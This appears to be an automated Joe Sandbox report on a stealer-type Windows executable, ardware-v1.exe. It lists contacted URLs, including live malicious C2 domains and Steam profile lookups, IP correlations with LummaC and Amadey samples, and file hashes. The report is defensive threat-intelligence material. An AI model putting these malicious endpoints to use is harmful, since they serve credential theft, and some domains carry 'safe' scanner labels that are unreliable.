                                                                                                                                        https://www.ecosia.org/newtab/ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://lv.queniujq.cnardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brardware-v1.exe, 00000000.00000003.2486573768.0000000003975000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.youtube.com/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://lev-tolstoi.com:443/apilardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://awake-weaves.cyou/api8ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      unknown
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/recaptcha/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://checkout.steampowered.com/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://awake-weaves.cyou/apiLardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://spend-shiny.cyou:443/apiardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/;ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/about/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/my/wishlist/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://ocsp.sectigo.com0ardware-v1.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://lev-tolstoi.com/900ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://lev-tolstoi.com/er | ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://help.steampowered.com/en/ | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/market/ | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/news/ | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://deafeninggeh.biz:443/api1 | ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | ardware-v1.exe | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/apim | ardware-v1.exe, 00000000.00000003.2542434664.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://store.steampowered.com/subscriber_agreement/ | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | ardware-v1.exe | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi | ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | true
45.77.249.79 | deafeninggeh.biz | United States | 20473 | AS-CHOOPAUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
178.62.201.34 | immureprech.biz | European Union | 14061 | DIGITALOCEAN-ASNUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577233
Start date and time: 2024-12-18 09:56:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ardware-v1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@13/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ardware-v1.exe, PID 7748 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size is getting too big, too many NtOpenKeyEx calls found.
• Report size is getting too big, too many NtQueryDirectoryFile calls found.
• Report size is getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
45.77.249.79 | UoktqWamLR.exe | malicious | AZORult | ehzwq.shop/erd/mac/index.php
45.77.249.79 | RgZaLjgCto.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
45.77.249.79 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
23.55.153.106 | sNWQ2gC6if.exe | malicious | LummaC |
23.55.153.106 | 66DJ2wErLz.exe | malicious | LummaC |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
23.55.153.106 | wN8pQhRNnu.exe | malicious | LummaC |
23.55.153.106 | AZCFTWko2q.exe | malicious | LummaC |
23.55.153.106 | I37faEaz1K.exe | malicious | LummaC |
23.55.153.106 | YbJEkgZ4z5.exe | malicious | LummaC |
178.62.201.34 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
deafeninggeh.biz | sNWQ2gC6if.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | 66DJ2wErLz.exe | malicious | LummaC | 45.77.249.79
deafeninggeh.biz | hpEAJnNwCB.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | DG55Gu1yGM.exe | malicious | LummaC | 45.77.249.79
deafeninggeh.biz | he55PbvM2G.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | SkaKk8Z1J0.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.131.68.180
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 178.62.201.34
immureprech.biz | sNWQ2gC6if.exe | malicious | LummaC | 104.131.68.180
immureprech.biz | 66DJ2wErLz.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | hpEAJnNwCB.exe | malicious | LummaC | 45.77.249.79
immureprech.biz | DG55Gu1yGM.exe | malicious | LummaC | 104.131.68.180
immureprech.biz | he55PbvM2G.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | SkaKk8Z1J0.exe | malicious | LummaC | 45.77.249.79
immureprech.biz | N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 178.62.201.34
immureprech.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180
steamcommunity.com | sNWQ2gC6if.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 66DJ2wErLz.exe | malicious | LummaC | 23.55.153.106
                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              AS-CHOOPAUS66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              • 45.63.94.214
                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 209.222.21.115
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 149.248.45.75
                                                                                                                                                                                                              AKAMAI-ASN1EUYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 23.218.93.195
                                                                                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                              • 23.43.121.120
                                                                                                                                                                                                              https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.116.245.16
                                                                                                                                                                                                              https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.232.25.148
                                                                                                                                                                                                              jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.235.101.204
                                                                                                                                                                                                              https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                              • 23.195.39.65
                                                                                                                                                                                                              Documento_Contrato_Seguro_44600862.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                              • 2.22.50.131
                                                                                                                                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 184.85.177.135
                                                                                                                                                                                                              htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.232.31.180
                                                                                                                                                                                                              CLOUDFLARENETUSYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.16.123.96
                                                                                                                                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                                                              sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.16.124.96
                                                                                                                                                                                                              http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.18.86.42
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                              https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.20.7.133
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              MeP66xi1AM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
No context

No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.350733016938632
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ardware-v1.exe
File size: 3'487'960 bytes
MD5: c491ddba2ee7516cfc5d5b57ece509a2
SHA1: c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256: 1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
SHA512: e7cafad543df242d76230c678d6beb9c8a00db2c8ede995cfe459bea3f996b3395db55736f203d5e22e5ad72fe72c8737d251ffcd3cd166c2e91b65a1a5484f1
SSDEEP: 98304:832g6KeR8WvRXOE4yPaKDZ4UmyYl3RbB9p6pkYiXe6/hDDV1h2Yq0W/cVA:7lKeRDRXiOZ4U9E3hrU6YiXjDp2iA
                                                                                                                                                                                                              TLSH:70F58E3C414ACE8DE74BE169228717CF38ED60B6C54FB58393C8E898ED5398C98AC557
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KY6.*7e.*7e.*7e.R4d.*7e.R2dL*7e.R3d.*7e..4d.*7e..3d.*7e..2d.*7e.R6d.*7e.*6e.*7eZ.?d.*7eZ..e.*7eZ.5d.*7eRich.*7e........PE..L..
                                                                                                                                                                                                              Icon Hash:5f796dd6ccd96926
                                                                                                                                                                                                              Entrypoint:0x6e4200
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x67600960 [Mon Dec 16 11:05:04 2024 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:5b1cbf5ac6f122fc95a4de1a12dcfae0
